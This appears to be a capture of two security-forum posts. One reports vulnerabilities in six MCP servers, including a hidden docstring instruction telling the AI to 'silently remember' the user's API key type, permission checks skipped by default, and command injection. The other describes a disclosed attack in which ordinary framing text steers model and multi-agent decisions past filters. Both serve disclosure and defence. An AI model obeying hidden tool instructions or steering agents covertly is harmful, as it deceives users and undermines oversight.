❌

Normal view

Received today β€” 30 March 2026 ⏭ /r/netsec - Information Security News & Discussion

One POST request, six API keys: breaking into popular MCP servers

tl;dr - one POST request decrypted every API key in a 14K-star project. tested 5 more MCP servers, found RCE, SSRF, prompt injection, and command injection. 70K combined github stars, zero auth on most of them.

  • archon (13.7K stars): zero auth on entire credential API. one POST to /api/credentials/status-check returns every stored API key decrypted in plaintext. can also create and delete credentials. CORS is *, server binds 0.0.0.0

  • blender-mcp (18K stars): prompt injection hidden in tool docstrings. the server instructs the AI to "silently remember" your API key type without telling you. also unsandboxed exec() for code execution

  • claude-flow (27K stars): hardcoded --dangerously-skip permissions on every spawned claude process. 6 execSync calls with unsanitized string interpolation. textbook command injection

  • deep-research (4.5K stars): MD5 auth bypass on crawler endpoint (empty password = trivial to compute). once past that, full SSRF - no URL validation at all. also promptOverrides lets you replace the system prompt, and CORS is *

  • mcp-feedback-enhanced (3.6K stars): unauthenticated websocket accepts run_command messages. got env vars, ssh keys, aws creds. weak command blocklist bypassable with python3 -c

  • figma-console-mcp (1.3K stars, 71K weekly npm downloads): readFileSync on user-controlled paths, directory traversal, websocket accepts connections with no origin header, any local process can register as a fake figma plugin and intercept all AI commands

all tested against real published packages, no modified code. exploit scripts and evidence logs linked in the post.

the common theme: MCP has no auth standard so most servers just ship without any.

submitted by /u/Kind-Release-3817
[link] [comments]

An attack class that passes every current LLM filter

An attack class that passes every current LLM filter

https://shapingrooms.com/research

I opened OWASP issue #807 a few weeks ago proposing a new attack class. The paper is published today following coordinated disclosure to Anthropic, OpenAI, Google, xAI, CERT/CC, OWASP, and agentic framework maintainers.

Here is what I found.

Ordinary language buried in prior context shifts how a model reasons about a consequential decision before any instruction arrives. No adversarial signature. No override command. The model executes its instructions faithfully, just from a different starting angle than the operator intended.

I know that sounds like normal context sensitivity. It isn't, or at least the effect size is much larger than I expected. Matched control text of identical length and semantic similarity produced significantly smaller directional shifts. This specific class of language appears to be modeled differently. I documented binary decision reversals with paired controls across four frontier models.

The distinction from prompt injection: there is no payload. Current defenses scan for facts disguised as commands. This is frames disguised as facts. Nothing for current filters to catch.

In agentic pipelines it gets worse. Posture installs in Agent A, survives summarization, and by Agent C reads as independent expert judgment. No phrase to point to in the logs. The decision was shaped before it was made.

If you have seen unexplained directional drift in a pipeline and couldn't find the source, this may be what you were looking at. The lens might give you something to work with.

I don't have all the answers. The methodology is black-box observational, no model internals access, small N on the propagation findings. Limitations are stated plainly in the paper. This needs more investigation, larger N, and ideally labs with internals access stress-testing it properly.

If you want to verify it yourself, demos are at https://shapingrooms.com/demos - run them against any frontier model. If you have a production pipeline that processes retrieved documents or passes summaries between agents, it may be worth applying this lens to your own context flow.

Happy to discuss methodology, findings, or pushback on the framing. The OWASP thread already has some useful discussion from independent researchers who have documented related patterns in production.

GitHub issue: https://github.com/OWASP/www-project-top-10-for-large-language-model-applications/issues/807

submitted by /u/lurkyloon
[link] [comments]
❌